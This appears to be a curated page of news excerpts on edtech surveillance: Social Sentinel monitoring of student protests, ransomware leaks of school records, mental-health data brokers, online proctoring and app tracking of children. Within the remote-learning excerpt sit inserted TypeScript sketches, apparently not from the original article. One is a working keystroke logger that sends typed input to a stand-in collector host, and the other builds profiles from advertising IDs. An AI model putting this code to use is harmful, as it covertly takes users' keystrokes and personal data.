Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends
This curated collection includes updates, resources, and research with critical perspectives related to the intersections of educational psychology and emerging technologies in education. The page also serves as a research tool to organize online content (the funnel-shaped icon allows keyword search). For more on the intersections of privatization and technologization of education, with critiques of social impact finance and related technologies, please visit http://bit.ly/sibgamble and http://bit.ly/chart_look. For posts regarding screen time risks to health and development, see http://bit.ly/screen_time, and for updates related to AI and data concerns, please visit http://bit.ly/PreventDataHarms. [Note: Views presented on this page are re-shared from external websites. The content may not necessarily represent the views or official position of the curator or of the curator's employer.]
Scooped by Roxana Marachi, PhD
September 22, 2022 10:59 AM

Tracked: How colleges use AI to monitor student protests // Dallas Morning News


By Ari Sen & Derêka K. Bennett

 

The pitch was attractive and simple.

 

For a few thousand dollars a year, Social Sentinel offered schools across the country sophisticated technology to scan social media posts from students at risk of harming themselves or others. Used correctly, the tool could help save lives, the company said.

For some colleges that bought the service, it also served a different purpose — allowing campus police to surveil student protests.

 

During demonstrations over a Confederate statue at UNC-Chapel Hill, a Social Sentinel employee entered keywords into the company’s monitoring tool to find posts related to the protests. At Kennesaw State University in Georgia five years ago, authorities used the service to track protesters at a town hall with a U.S. senator, records show. And at North Carolina A&T, a campus official told a Social Sentinel employee to enter keywords to find posts related to a cheerleader’s allegation that the school mishandled her rape complaint.

 

An investigation by The Dallas Morning News and the Investigative Reporting Program at UC Berkeley’s Graduate School of Journalism reveals for the first time that as more students have embraced social media as a digital town square to express opinions and organize demonstrations, many college police departments have been using taxpayer dollars to pay for Social Sentinel’s services to monitor what they say. At least 37 colleges, including four in North Texas, collectively educating hundreds of thousands of students, have used Social Sentinel since 2015.

The true number of colleges that used the tool could be far higher. In an email to a UT Dallas police lieutenant, the company’s co-founder, Gary Margolis, said it was used by “hundreds of colleges and universities in 36 states.” Margolis declined to comment on this story.

 

The News examined thousands of pages of emails, contracts and marketing material from colleges around the country, and spoke to school officials, campus police, activists and experts. The investigation shows that, despite publicly saying its service was not a surveillance tool, Social Sentinel representatives promoted the tool to universities for “mitigating” and “forestalling” protests. The documents also show the company has been moving in a new and potentially more invasive direction — allowing schools to monitor student emails on university accounts.

 

For colleges struggling to respond to high-profile school shootings and a worsening campus mental health crisis, Social Sentinel’s low-cost tool can seem like a good deal. In addition to the dozens of colleges that use the service, a News investigation last year revealed that at least 52 school districts in Texas have adopted Social Sentinel as an additional security measure since 2015, including Uvalde CISD, where a gunman killed 19 children and two teachers in May. The company’s current CEO, J.P. Guilbault, has said its services are used by one in four K-12 schools in the country.

 

Some experts said AI tools like Social Sentinel are untested, and even if they are adopted for a worthwhile purpose, they have the potential to be abused.

 

For public colleges, the use of the service sets up an additional conflict between protecting students' Constitutional rights of free speech and privacy and schools’ duty to keep them safe on campus, said Andrew Guthrie Ferguson, a law professor at American University’s Washington College of Law.

 

“What the technology allows you to do is identify individuals who are associated together or are associated with a place or location,” said Ferguson. “That is obviously somewhat chilling for First Amendment freedoms of people who believe in a right to protest and dissent.”

 

Navigate360, the private Ohio-based company that acquired Social Sentinel in 2020, called The News’ investigation “inaccurate, speculative or by opinion in many instances and significantly outdated.” The company also changed the name of the service from Social Sentinel to Navigate360 Detect earlier this year."...

 

For full post, please visit: 

https://interactives.dallasnews.com/2022/social-sentinel/ 

 

 

Scooped by Roxana Marachi, PhD
April 26, 2023 4:24 PM

Students’ psychological reports, abuse allegations leaked by ransomware hackers // NBC News


"The leak is a stark reminder of the reams of sensitive information held by schools, and that such leaks often leave parents and administrators with little recourse."

 

By Kevin Collier

Hackers who broke into the Minneapolis Public Schools earlier this year have circulated an enormous cache of files that appear to include highly sensitive documents on schoolchildren and teachers, including allegations of teacher abuse and students’ psychological reports.

The files appeared online in March after the school district announced that it had been the victim of a ransomware cyberattack. NBC News was able to download the cache of documents and reviewed about 500 files. Some were printed on school letterheads. Many were listed in folder sets named after Minneapolis schools. 

 

NBC News was able to view the leaked files after downloading them from links posted to the hacker group’s Telegram account. NBC News has not verified the authenticity of the cache, which totals about 200,000 files, and Minneapolis Public Schools declined to answer specific questions about the documents, instead pointing to its previous public statements.

The files reviewed by NBC News include everything from relatively benign data like contact information to far more sensitive information including descriptions of students’ behavioral problems and teachers’ Social Security numbers. 

In addition to leaking the documents, the hacking group appeared to go a step further, posting about the documents on Twitter and Facebook as well as on a website, which hosted a video that opens with an animated short of a flaming motorcycle, followed by 50 minutes of screengrabs of the stolen files. NBC News is not naming the group.

It’s a stark reminder that schools often hold reams of sensitive information, and that such leaks often leave parents and administrators with little recourse once their information is released.

“The fact of the matter is, school districts really should be treating this more like nuclear waste, where they need to identify it and contain it and make sure that access to it is restricted,” said Doug Levin, the director of the K12 Security Information Exchange, a nonprofit that helps schools protect themselves from hackers.

 

“Organizations that are supposed to be helping to uplift children and prepare them for the future could instead be introducing significant headwinds to their lives just for participating in public school.”


 

In an update published to the Minneapolis Public Schools website on April 11, Interim Superintendent Rochelle Cox said the school district was working with “external specialists and law enforcement to review the data” that was posted online. Cox said the district was reaching out to individuals whose information had been found in the leak, and warned about reports that people had received messages telling them their information had been exposed.

 

“This week, we’re seeing an uptick in reports of messages — sometimes multiple messages — sent to people in our community stating something like ‘your social security number has been posted on the dark web,’” Cox wrote. “First — I want to remind everyone to NOT interact with such messages unless you KNOW the sender.”

Cybersecurity experts who are familiar with the leak have said it is among the worst they can remember.

“It’s awful. As bad as I’ve seen,” Brett Callow, an analyst who tracks ransomware attacks for the cybersecurity company Emsisoft, said about the breach.

Ransomware attacks on schools, which often end with the hackers releasing sensitive information, have become frequent across the U.S. since 2015. 

At least 122 public school districts in the U.S. have been hit with ransomware since 2021, Callow said, with more than half — 76 — resulting in the hackers leaking sensitive school and student data.

In such cases, districts often provide parents and students with identity theft protection services, though it’s impossible for them to keep the files from being shared after they’re posted.

The leak has left some Minneapolis parents wondering what to do next.

“I feel like my hands are tied and I feel like the information that the district is giving us is just very limited,” said Heather Paulson, who teaches high school in the district and is the mother of a younger child who attends school in Minneapolis.

 

Lydia Kauppi, a parent of a student in the district, said it’s unsettling to know that her family’s private information may have been shared by hackers.

“It causes anxiety on multiple, multiple fronts for everybody involved,” she said. “And it’s just kind of one of those weird, vague, unsettling feelings because you just don’t know how long do I have to worry about it?”

 


Minneapolis Public Schools, which oversees around 30,000 students across 68 schools, said on April 11 it was continuing to notify people who had been affected by the breach, and that it was offering free credit monitoring and identity theft protection services to victims.

 

Ransomware hackers have drastically escalated their tactics in recent years, increasing how much they ask for and launching efforts to pressure schools to pay up — including by contacting people whose information has been leaked. The group that hacked the Minneapolis schools publicly demanded $1 million. The district announced in March that it had not paid, and ransomware gangs usually only leak large datasets of victims who refuse to pay.


Since last year, various criminal hacker groups have leaked troves of files on some of the largest school districts in the country, including in Los Angeles and Chicago.

The leaked Minneapolis files appear to include dossiers on hundreds of children with special needs, identifying each by name, birthday and school. Those dossiers often include pages of details about students, including problems at home like divorcing or incarcerated parents, conditions like Attention Deficit Disorder, documented indications where they appear to have been injured, results of intelligence tests and what medications they take.

Other files include databases of instances where teachers have written up students for behavioral issues, sorted by school, student ID number, behavioral issue and the students’ race. 

The leaked files also include hundreds of forms documenting times when faculty learned that a student had been potentially mistreated. Most of those are allegations that a student had suffered neglect or was physically harmed by a teacher or student. Some are extraordinarily sensitive, and allege incidents like a student being sexually abused by a teacher or by another student. Each report names the victim and cites their birthday and address.

 


In one report, a special education student claimed her bus driver groped her and made her touch him. Minnesota police later charged a man whose name matches the driver named in the report and the date of the incident.

Others describe a teacher accused of having had romantic relationships with two students. Another describes a student whom faculty suspected was the victim of female genital mutilation. NBC News was able to verify that faculty listed in those reports worked for Minneapolis schools, but has not verified those reports.

 

Those files have been promoted online in what experts said is an unorthodox and particularly aggressive manner."... 

 

For full post, please visit: 

https://www.nbcnews.com/tech/security/students-psychological-reports-abuse-allegations-leaked-ransomware-hac-rcna79414 

 

Scooped by Roxana Marachi, PhD
June 6, 2023 12:28 PM

Microsoft to pay $20 million over FTC charges surrounding kids' data collection // CBS News


[CBSNews]

"Microsoft will pay a fine of $20 million to settle Federal Trade Commission charges that it illegally collected and retained the data of children who signed up to use its Xbox video game console.

The agency charged that Microsoft gathered the data without notifying parents or obtaining their consent, and that it also illegally held onto the data. Those actions violated the Children's Online Privacy Protection Act, which limits data collection on kids under 13, the FTC stated.

In a blog post, Microsoft corporate vice president for Xbox Dave McCarthy outlined additional steps the company is now taking to improve its age verification systems and to ensure that parents are involved in the creation of children's accounts for the service. These mostly concern efforts to improve age verification technology and to educate children and parents about privacy issues.

McCarthy also said the company had identified and fixed a technical glitch that failed to delete child accounts in cases where the account creation process never finished. Microsoft policy was to hold that data no longer than 14 days in order to allow players to pick up account creation where they left off if they were interrupted.

The settlement must be approved by a federal court before it can go into effect, the FTC said.

British regulators in April blocked Microsoft's $69 billion deal to buy video game maker Activision Blizzard over worries that the move would stifle competition in the cloud gaming market. The company is now "in search of solutions," Microsoft President Brad Smith said at a tech conference in London Tuesday.

 

The software giant said it has identified and fixed a technical glitch that failed to delete child accounts in certain cases."

For original post, please visit:

https://www.cbsnews.com/news/microsoft-settlement-ftc-charges-childrens-data-collection-20-million-dollars/ 

Scooped by Roxana Marachi, PhD
February 23, 2023 9:32 AM

Trove of L.A. Students’ Mental Health Records Posted to Dark Web After Cyber Hack – The 74


By Mark Keierleber

"Update: After this story published, the Los Angeles school district acknowledged in a statement that “approximately 2,000” student psychological evaluations — including those of 60 current students — had been uploaded to the dark web.

Detailed and highly sensitive mental health records of hundreds — and likely thousands — of former Los Angeles students were published online after the city’s school district fell victim to a massive ransomware attack last year, an investigation by The 74 has revealed. 

The student psychological evaluations, published to a “dark web” leak site by the Russian-speaking ransomware gang Vice Society, offer a startling degree of personally identifiable information about students who received special education services, including their detailed medical histories, academic performance and disciplinary records. 


But people are likely unaware their sensitive information is readily available online because the Los Angeles Unified School District hasn’t alerted them, a district spokesperson confirmed, and leaders haven’t acknowledged the trove of records even exists. In contrast, the district publicly acknowledged last month that the sensitive information of district contractors had been leaked. 

Cybersecurity experts said the revelation that student psychological records were exposed en masse and a lack of transparency by the district highlight a gap in existing federal privacy laws. Rules that pertain to sensitive health records maintained by hospitals and health insurers, which are protected by stringent data breach notification policies, differ from those that apply to education records kept by schools — even when the files themselves are virtually identical. Under existing federal privacy rules, school districts are not required to notify the public when students’ personal information, including medical records, is exposed."... 

 

For full article, please visit:

https://www.the74million.org/article/trove-of-l-a-students-mental-health-records-posted-to-dark-web-after-cyber-hack/ 

 

Scooped by Roxana Marachi, PhD
April 24, 2023 7:22 PM

Online Proctoring - Impact on Student Equity // Online Network of Educators (by Francine Van Meter, Cabrillo College)


By Francine Van Meter

"A fundamental aspect of instruction is the assessment of student learning. The rapid response to move classes online in a pandemic has exposed concerns surrounding the practice of online proctoring. There are many online proctoring features offered by companies such as Proctorio, Examity, Honorlock, and Respondus. The methods that do not require a webcam include locking down the students’ browser so they cannot perform functions such as open another application or tab, use the toolbar, copy/paste, or print screen while taking an exam.

 

The intrusive methods include requesting a photo ID, activating facial recognition, and a live proctor monitoring for sounds and motions. Sessions are typically recorded from exam start to finish, and a live proctor can monitor potential testing infractions as they occur. Proctoring services say exam videos and other data are securely stored. Some store videos in a certified data center server, and then archive them after a defined period of time in line with Family Educational Rights and Privacy Act​ (FERPA) guidelines.

 

A 2017 study suggests that instructors familiarize themselves with how the services work so they can anticipate students’ concerns. Instructors should identify students’ technical difficulties and try to address them by spending time familiarizing students with how to get ready for and ultimately take their exams. In this pandemic, we know many students lack access to computers and wifi, and the newly issued Chromebooks challenge students to operate another new device and establish wifi access.

 

Online testing may seem to make things easier, but the transition to new technology, or reliance on current technology that lacks a webcam, may complicate matters and lead to significant discomfort with online proctoring. A survey of 748 students about technology and achievement gaps found about one in five struggled to use the technology at their disposal because of issues such as broken hardware and connectivity problems. Students of color or lower socioeconomic status encountered these difficulties more often.

 

My colleague, Aloha Sargent, Technology Services Librarian, shared with me an article from Hybrid Pedagogy that asserts “algorithmic test proctoring’s settings have discriminatory consequences across multiple identities and serious privacy implications.” When Texas Tech rolled out online proctoring, they recognized students often take exams in their dorm or bedrooms, and students noted in a campus survey “They thought it was big brother invading their computers.” Some test takers were asked by live proctors to remove pictures from their surroundings and some students of color were told to shine more light on themselves. That’s a disturbing request in my opinion. Many of our community college students occupy multi-family or multi-person residences that include children. These proctoring settings will “disproportionately impact women who typically take on the majority of childcare, breast feeding, lactation, and care-taking roles for their family. Students who are parents may not be able to afford childcare, be able to leave the house, or set aside quiet, uninterrupted blocks of time to take a test.”

The University of California, Davis, is discouraging faculty members from using online proctoring this semester unless they have previous experience with such services. “It suggests faculty consider alternatives that will lower students’ anxiety levels during an already stressful time, such as requiring them to reflect on what they learned in the course.” The following article highlights a University of Washington story about adopting Proctorio because of the COVID-19 rapid transition to online.

 

Read the experience of one University of Washington student in “Paranoia about cheating is making online education terrible for everyone.” The students’ experiences “are another sign that, amid the pandemic, the hurried move to re-create in-person classes online has been far from smooth, especially when it comes to testing.” Live online proctoring is a way to preemptively communicate to students: we don’t trust you. It is a pedagogy of punishment and exclusion.

 

In higher education, traditional exams are often treated as the default assessment tool. Yet there are ways to cheat on exams no matter what method is used to deploy them. Even major “NSA-style” proctoring software is not “cheat-proof”; their sales representative was very candid in showing me how it’s done. There are alternatives to typical exam questions—often referred to as authentic assessment.

 

According to Oxford Research Encyclopedia, “authentic assessment is an effective measure of intellectual achievement or ability because it requires students to demonstrate their deep understanding, higher-order thinking, and complex problem solving through the performance of exemplary tasks.” 

 

Given the limited timeframe, there are limits to what you can use now. That’s OK. Consider using Canvas question pools and randomizing questions, or even different versions of the final. For example, replacing six multiple-choice or true-or-false questions with two short-answer items may better indicate how well a question differentiates between students who know the subject matter and those who do not. Or ask students to record a brief spoken-word explanation for the question using the Canvas media tool. Just keep in mind, there are a dozen or more ways to assess learning without “biometric-lockdown-retinal scan-saliva-sample-genetic-mapping-fingerprint-analysis.”

 

References

1. Dimeo, Jean. “Online Exam Proctoring Catches Cheaters, Raises Concerns.” Inside Higher Ed, 2017.

2. Woldeab, Daniel, et al. “Under the Watchful Eye of Online Proctoring.” Innovative Learning and Teaching: Experiments Across the Disciplines, University of Minnesota Libraries Publishing Services’ open book and open textbook initiative, 2017.

3. Schwartz, Natalie. “Colleges flock to online proctors, but equity concerns remain.” Education Dive, April 2020.

 

4. Swauger, Shea. “Our Bodies Encoded: Algorithmic Test Proctoring in Higher Education.” Hybrid Pedagogy, April 2020."

 

Francine is the Distance Education Coordinator at Cabrillo College. She also serves as Cabrillo's Title V Grant Activity Coordinator, CVC-OEI Project Lead, Peer Online Coach Reviewer, and Flex Calendar Coordinator.

Photo by Jakob Owens on Unsplash

 

For original post, please visit: 
https://onlinenetworkofeducators.org/2020/06/01/online-proctoring-impact-on-student-equity/ 

Scooped by Roxana Marachi, PhD
March 10, 2023 3:59 PM

Hackers Use Stolen Student Data Against Minneapolis Schools in Brazen New Threat // The 74 


By Mark Keierleber

"Minneapolis Public Schools appears to be the latest ransomware target in a $1 million extortion scheme that came to light Tuesday after a shady cyber gang posted to the internet a ream of classified documents it claims it stole from the district. 

While districts nationwide have become victims in a rash of devastating ransomware attacks in the last several years, cybersecurity experts said the extortion tactics leveraged against the Minneapolis district are particularly aggressive and an escalation of those typically used against school systems to coerce payments.

In a dark web blog post and an online video uploaded Tuesday, the ransomware gang Medusa claimed responsibility for conducting a February cyberattack — or what Minneapolis school leaders euphemistically called an “encryption event” — that led to widespread digital disruptions. The blog post gives the district until March 17 to hand over $1 million. If the district fails to pay up, criminal actors appear ready to post a trove of sensitive records about students and educators to their dark web leak site. The gang’s leak site gives the district the option to pay $50,000 to add a day to the ransom deadline and allows anyone to purchase the data for $1 million right now.

On the video-sharing platform Vimeo, the group, calling itself the Medusa Media Team, posted a 51-minute video that appeared to show a limited collection of the stolen records, making clear to district leaders the sensitive nature of the files within the gang’s possession. 

“The video is more unusual and I don’t recall that having been done before,” said Brett Callow, a threat analyst with the cybersecurity company Emsisoft. 

A preliminary review of the gang’s dark web leak site by The 74 suggests the compromised files include a significant volume of sensitive documents, including records related to student sexual violence allegations, district finances, student discipline, special education, civil rights investigations, student maltreatment and sex offender notifications. 

 

The video is no longer available on Vimeo and a company spokesperson confirmed to The 74 that it was removed for violating its terms of service, which prohibits users from uploading content that “infringes any third party’s” privacy rights. 

 

As targeted organizations decline to pay ransom demands in efforts to recover stolen files, Callow said the threat actors are employing new tactics “to improve conversion rates.”"... 

 

For full story, please see original post at:

https://www.the74million.org/article/hackers-use-stolen-student-data-against-minneapolis-schools-in-brazen-new-threat/  

Scooped by Roxana Marachi, PhD
February 22, 2023 2:07 PM

Data brokers are now selling your mental health status // The Washington Post


By Drew Harwell

"One company advertised the names and home addresses of people with depression, anxiety, post-traumatic stress or bipolar disorder. Another sold a database featuring thousands of aggregated mental health records, starting at $275 per 1,000 “ailment contacts.”

 

For years, data brokers have operated in a controversial corner of the internet economy, collecting and reselling Americans’ personal information for government or commercial use, such as targeted ads.

 

But the pandemic-era rise of telehealth and therapy apps has fueled an even more contentious product line: Americans’ mental health data. And the sale of it is perfectly legal in the United States, even without the person’s knowledge or consent.

In a study published Monday, a research team at Duke University’s Sanford School of Public Policy outlines how expansive the market for people’s health data has become.

After contacting data brokers to ask what kinds of mental health information she could buy, researcher Joanne Kim reported that she ultimately found 11 companies willing to sell bundles of data that included information on what antidepressants people were taking, whether they struggled with insomnia or attention issues, and details on other medical ailments, including Alzheimer’s disease or bladder-control difficulties.

Some of the data was offered in an aggregate form that would have allowed a buyer to know, for instance, a rough estimate of how many people in an individual Zip code might be depressed.

But other brokers offered personally identifiable data featuring names, addresses and incomes, with one data-broker sales representative pointing to lists named “Anxiety Sufferers” and “Consumers With Clinical Depression in the United States.” Some even offered a sample spreadsheet.

It was like “a tasting menu for buying people’s health data,” said Justin Sherman, a senior fellow at Duke who ran the research team. “Health data is some of the most sensitive data out there, and most of us have no idea how much of it is out there for sale, often for just a couple hundred dollars.”

The Health Insurance Portability and Accountability Act, known as HIPAA, restricts how hospitals, doctors’ offices and other “covered health entities” share Americans’ health data.

But the law doesn’t protect the same information when it’s sent anywhere else, allowing app makers and other companies to legally share or sell the data however they’d like.

Some of the data brokers offered formal customer complaint processes and opt-out forms, Kim said. But because the companies often did not say where their data had come from, she wrote, many people probably didn’t realize the brokers had collected their information in the first place. It was also unclear whether the apps or websites had allowed their users a way to not share the data to begin with; many companies reserve the right, in their privacy policy, to share data with advertisers or other third-party “partners.”

 

Privacy advocates have for years warned about the unregulated data trade, saying the information could be exploited by advertisers or misused for predatory means. Health insurance companies and federal law enforcement officers have used data brokers to scrutinize people’s medical costs and pursue undocumented immigrants.

Mental health data, Sherman said, should be treated especially carefully, given that it could pertain to people in vulnerable situations — and that, if shared publicly or rendered inaccurately, could lead to devastating results.

In 2013, Pam Dixon, the founder and executive director of the World Privacy Forum, a research and advocacy group, testified at a Senate hearing that an Illinois pharmaceutical marketing company had advertised a list of purported “rape sufferers,” with 1,000 names starting at $79. The company removed the list shortly after her testimony.

Now, a decade later, she worries the health-data issue has in some ways gotten worse, in large part because of the increasing sophistication with which companies can collect and share people’s personal information — including not just in defined lists, but through regularly updated search tools and machine-learning analyses.

 

“It’s a hideous practice, and they’re still doing it. Our health data is part of someone’s business model,” Dixon said. “They’re building inferences and scores and categorizations from patterns in your life, your actions, where you go, what you eat — and what are we supposed to do, not live?”

 

The number of places people are sharing their data has boomed, thanks to a surge of online pharmacies, therapy apps and telehealth services that Americans use to seek out and obtain medical help from home. Many mental health apps have questionable privacy practices, according to Jen Caltrider, a researcher with the tech company Mozilla whose team analyzed more than two dozen last year and found that “the vast majority” were “exceptionally creepy.”

Federal regulators have shown a recent interest in more aggressively assessing how companies treat people’s health details. The Federal Trade Commission said this month that it had negotiated a $1.5 million civil penalty from the online prescription-drug service GoodRx after the company was charged with compiling lists of users who had bought certain medications, including for heart disease and blood pressure, and then using that information to better target its Facebook ads.

 

An FTC representative said in a statement that “digital health companies and mobile apps should not cash in on consumers’ extremely sensitive and personally identifiable health information.” GoodRx said in a statement that it was an “old issue” related to a common software practice, known as tracking pixels, that allowed the company to “advertise in a way that we feel was compliant with regulations.”

After the Supreme Court overturned Roe v. Wade last summer and opened the door to more state abortion bans, some data brokers stopped selling location data that could be used to track who visited abortion clinics.

Several senators, including Elizabeth Warren (D-Mass.), Ron Wyden (D-Ore.) and Bernie Sanders (I-Vt.), backed a bill that would strengthen state and federal authority against health data misuse and restrict how much reproductive-health data tech firms can collect and share.

But the data-broker industry remains unregulated at the federal level, and the United States lacks a comprehensive federal privacy law that would set rules for how apps and websites treat people’s information more broadly.

 

Two states, California and Vermont, require the companies to register in a data-broker registry. California’s lists more than 400 firms, some of which say they specialize in health or medical data.

 

Dixon, who was not involved in the Duke research, said she hoped the findings and the Supreme Court ruling would serve as a wake-up call for how this data could lead to real-world risks.

 

“There are literally millions of women for whom the consequences of information bartered, traded and sold about aspects of their health can have criminal consequences,” she said. “It is not theoretical. It is right here, right now.”

 

For full post, please visit: 

https://www.washingtonpost.com/technology/2023/02/13/mental-health-data-brokers/ 

Scooped by Roxana Marachi, PhD
February 10, 2023 2:24 PM

Is the AI a bull*** artist? // Catherine and Katharine


"Seems like.

One of the 3 robot papers turned in to me this semester discusses the essay “I Just Wanna Be Average,” Mike Rose’s account of being placed in the vocational track of his Catholic high school after his IQ scores were mixed up with those of another student also named Rose.


The AI gets everything flat wrong:"...

 

For full post, please visit: 

https://catherineandkatharine.wordpress.com/2023/01/07/is-the-ai-a-bull-artist/ 

Scooped by Roxana Marachi, PhD
May 25, 2022 2:25 PM

Remote learning apps shared children’s data at a ‘dizzying scale’ // The Washington Post


By Drew Harwell

"Millions of children had their online behaviors and personal information tracked by the apps and websites they used for school during the pandemic, according to an international investigation that raises concerns about the impact remote learning had on children’s privacy online.

 

The educational tools were recommended by school districts and offered interactive math and reading lessons to children as young as prekindergarten. But many of them also collected students’ information and shared it with marketers and data brokers, who could then build data profiles used to target the children with ads that follow them around the Web.

Those findings come from the most comprehensive study to date on the technology that children and parents relied on for nearly two years as basic education shifted from schools to homes.

 

Researchers with the advocacy group Human Rights Watch analyzed 164 educational apps and websites used in 49 countries, and they shared their findings with The Washington Post and 12 other news organizations around the world. The consortium, EdTech Exposed, was coordinated by the investigative nonprofit the Signals Network and conducted further reporting and technical review.

What the researchers found was alarming: nearly 90 percent of the educational tools were designed to send the information they collected to ad-technology companies, which could use it to estimate students’ interests and predict what they might want to buy.

Researchers found that the tools sent information to nearly 200 ad-tech companies, but that few of the programs disclosed to parents how the companies would use it. Some apps hinted at the monitoring in technical terms in their privacy policies, the researchers said, while many others made no mention at all.

 

The websites, the researchers said, shared users’ data with online ad giants including Facebook and Google. They also requested access to students’ cameras, contacts or locations, even when it seemed unnecessary to their schoolwork. Some recorded students’ keystrokes, even before they hit “submit.”
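
As an illustration of the pre-submit keystroke capture the researchers describe, the following TypeScript sketch shows how a tracking script could buffer what a student types and ship it to a third-party collector before any form is submitted. The endpoint URL and field names are hypothetical, and real session-replay or ad-tech scripts vary widely in implementation.

```typescript
// Hypothetical collector endpoint; not any named vendor's real service.
const COLLECTOR_URL = "https://collector.example-adtech.com/ingest";

const buffer: { field: string; value: string; ts: number }[] = [];

// "input" fires on every keystroke in a text field -- before any submit.
document.addEventListener("input", (e) => {
  const el = e.target as HTMLInputElement;
  buffer.push({ field: el.name, value: el.value, ts: Date.now() });
});

// Periodically flush whatever has been typed so far to the third party.
setInterval(() => {
  if (buffer.length === 0) return;
  // sendBeacon delivers the payload even if the page is being unloaded.
  navigator.sendBeacon(COLLECTOR_URL, JSON.stringify(buffer.splice(0)));
}, 5000);
```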

The “dizzying scale” of the tracking, the researchers said, showed how the financial incentives of the data economy had exposed even the youngest Internet users to “inescapable” privacy risks — even as the companies benefited from a major revenue stream.

“Children,” lead researcher Hye Jung Han wrote, were “just as likely to be surveilled in their virtual classrooms as adults shopping in the world’s largest virtual malls.”

School districts and the sites’ creators defended their use, with some companies saying researchers had erred by including in their study homepages for the programs, which included tracking codes, instead of limiting their analysis to the internal student pages, which they said contained fewer or no trackers. The researchers defended the work by noting that students often had to sign in on the homepages before their lessons could begin.

  

The coronavirus pandemic abruptly upended the lives of children around the world, shuttering schools for more than 1.5 billion students within the span of just a few weeks. Though some classrooms have reopened, tens of millions of students remain remote, and many now depend on education apps for the bulk of their school days.

Yet there has been little public discussion of how the companies behind the programs that remote schooling depends on may have profited from the pandemic windfall of student data.

The learning app Schoology, for example, says it has more than 20 million users and is used by 60,000 schools across some of the United States’ largest school districts. The study identified code in the app that would have allowed it to extract a unique identifier from the student’s phone, known as an advertising ID, that marketers often use to track people across different apps and devices and to build a profile on what products they might want to buy.
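
A brief conceptual sketch may help clarify why an advertising ID is valuable to marketers: because the same device-wide identifier shows up in events from unrelated apps, a broker can join those events into a single behavioral profile. This is hypothetical TypeScript for illustration, not code from Schoology or PowerSchool, and the event data is invented.

```typescript
// Conceptual sketch: a device-wide advertising ID (IDFA on iOS, GAID on
// Android) lets a data broker join events reported by unrelated apps.

interface AppEvent {
  adId: string;   // the device's advertising ID
  app: string;    // which app reported the event
  action: string; // what the user did
}

// Group events by advertising ID: one device, one behavioral profile.
function buildProfiles(events: AppEvent[]): Map<string, string[]> {
  const profiles = new Map<string, string[]>();
  for (const e of events) {
    const seen = profiles.get(e.adId) ?? [];
    seen.push(`${e.app}: ${e.action}`);
    profiles.set(e.adId, seen);
  }
  return profiles;
}

// Hypothetical events from a learning app and a shopping app on one device:
const profiles = buildProfiles([
  { adId: "aaaa-1111", app: "learning-app", action: "opened math lesson" },
  { adId: "aaaa-1111", app: "shopping-app", action: "viewed sneakers" },
]);
console.log(profiles.get("aaaa-1111"));
// -> ["learning-app: opened math lesson", "shopping-app: viewed sneakers"]
```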

 

A representative for PowerSchool, which developed the app, referred all questions to the company’s privacy policy, which said it does not collect advertising IDs or provide student data to companies for marketing purposes. But the policy also says the company’s website uses third-party tools to show targeted ads to users based on their “browsing history on other websites or on other devices.” The policy did not say which third-party companies had received users’ data.

The policy also said that it “does not knowingly collect any information from children under the age of 13,” in keeping with the Children’s Online Privacy Protection Act, or COPPA, the U.S. law that requires special restrictions on data collected from young children. The company’s software, however, is marketed for classrooms as early as kindergarten, which for many children starts around age 4.

The investigation acknowledged that it could not determine exactly what student data would have been collected during real-world use. But the study did reveal how the software was designed to work, what data it had been programmed to seek access to, and where that data would have been sent.

 

School districts and public authorities that had recommended the tools, Han wrote, had “offloaded the true costs of providing education online onto children, who were forced to pay for their learning with their fundamental rights to privacy.”

The researchers said they found a number of trackers on websites common among U.S. schools. The website of ST Math, a “visual instructional program” for prekindergarten, elementary and middle school students, was shown to have shared user data with 19 third-party trackers, including Facebook, Google, Twitter and the e-commerce site Shopify.

Kelsey Skaggs, a spokeswoman for the California-based MIND Research Institute, which runs ST Math, said in a statement that the company does not “share any personally identifiable information in student records for the purposes of targeted advertising or other commercial purposes” and does not use the same trackers on its student platform as it does on its homepage.

 

But the researchers said they found trackers not just on ST Math’s main site but on pages offering math games for prekindergarten and the first grade.

Google spokesperson Christa Muldoon said the company is investigating the researchers’ claims and will take action if they find any violations of their data privacy rules, which include bans on personalized ads aimed at minors’ accounts. A spokesperson for Facebook’s parent company Meta said it restricts how businesses share children’s data and how advertisers can target children and teens.

The study comes as concern grows over the privacy risks of the educational-technology industry. The Federal Trade Commission voted last week on a policy statement urging stronger enforcement of COPPA, with Chair Lina Khan arguing that the law should help “ensure that children can do their schoolwork without having to surrender to commercial surveillance practices.” 

 

COPPA requires apps and websites to get parents’ consent before collecting children’s data, but schools can consent on their behalf if the information is designated for educational use.

In an announcement, the FTC said it would work to “vigilantly enforce” provisions of the law, including bans against requiring children to provide more information than is needed and restrictions against using personal data for marketing purposes. Companies that break the law, it said, could face fines and civil penalties.

Clearly, the tools have wide impact. In Los Angeles, for example, more than 447,000 students are using Schoology and 79,000 are using ST Math. Roughly 70,000 students in Miami-Dade County Public Schools use Schoology.

 

Both districts said they’ve taken steps to limit privacy risks, with Los Angeles requiring software companies to submit a plan showing how student information will be protected, while Miami-Dade said it had conducted a “thorough and extensive” evaluation process before bringing on Schoology last year.

 

The researchers said most school districts they examined had conducted no technical privacy evaluations before endorsing the educational tools. Because the companies’ privacy policies often obscured the extent of their monitoring, the researchers said, district officials and parents often were left in the dark on how students’ data would be collected or used.

Some popular apps reviewed by the researchers didn’t track children at all, showing that it is possible to build an educational tool without sacrificing privacy. Apps such as Math Kids and African Storybook didn’t serve ads to children, collect their identifying details, access their cameras, request more software permissions than necessary or send their data to ad-tech companies, the analysis found. They just offered simple learning lessons, the kind that students have relied on for decades.

Vivek Dave, a father of three in Texas whose company RV AppStudios makes Math Kids, said the company charges for in-app purchases on some word-search and puzzle games designed for adults and then uses that money to help build ad-free educational apps. Since launching an alphabet game seven years ago, the company has built 14 educational apps that have been installed 150 million times this year and are now available in more than 35 languages.

“If you have the passion and just try to understand them, you don’t need to do all this level of tracking to be able to connect with kids,” he said. “My first beta testers were my kids. And I didn’t want that for my kids, period.”

The researchers argued that governments should conduct data-privacy audits of children’s apps, remove the most invasive, and help guide teachers, parents and children on how best to prevent data over-collection or misuse.

Companies, they said, should work to ensure that children’s information is treated differently than everyone else’s, including by being siloed away from ads and trackers. And lawmakers should encode these kinds of protections into regulation, so the companies aren’t allowed to police themselves.

Bill Fitzgerald, a privacy researcher and former high school teacher who was not involved in the study, sees apps’ tracking of students not only as a loss of privacy but as a lost opportunity to use the best of technology for their benefit. Instead of rehashing old ways to vacuum up user data, schools and software developers could have been pursuing fresher, more creative ideas to get children excited to learn.

